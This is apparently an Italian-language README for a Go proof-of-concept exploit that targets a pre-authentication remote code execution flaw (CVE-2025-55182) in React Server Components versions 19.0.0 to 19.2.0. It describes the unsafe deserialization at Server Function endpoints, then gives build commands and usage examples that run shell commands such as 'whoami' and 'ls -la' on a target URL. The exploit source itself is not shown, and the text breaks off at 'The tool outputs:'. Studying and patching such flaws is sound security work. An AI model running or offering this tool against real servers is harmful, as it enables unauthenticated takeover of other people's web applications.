
Codice di exploit per la vulnerabilità React2Shell RCE (CVE-2025-55182) che colpisce React Server Components 19.0.0-19.2.0. Sfrutta una deserializzazione non sicura per esecuzione remota di codice non autenticata.
Proof of Concept (PoC) per la vulnerabilità di Remote Code Execution in React Server Components (RSC) / Next.js.
Una vulnerabilità di remote code execution pre-autenticazione esiste nelle versioni 19.0.0, 19.1.0, 19.1.1 e 19.2.0 di React Server Components, inclusi i seguenti pacchetti: react-server-dom-parcel, react-server-dom-turbopack e react-server-dom-webpack. Il codice vulnerabile deserializza in modo non sicuro i payload dalle richieste HTTP agli endpoint delle Server Function.
⚠️ AVVERTENZA: Questo strumento è solo per test di sicurezza autorizzati.
go build -o exploit exploit.go
Oppure esegui direttamente:
go run exploit.go
./exploit -u <URL> -c <command>
-u - URL di destinazione (obbligatorio)-c - Comando da eseguire (default: id)# Basic usage
./exploit -u https://vulnerable -c "whoami"
# Execute different command
./exploit -u https://vulnerable -c "ls -la"
# Run directly with go
go run exploit.go -u https://vulnerable -c "pwd"

The tool outputs: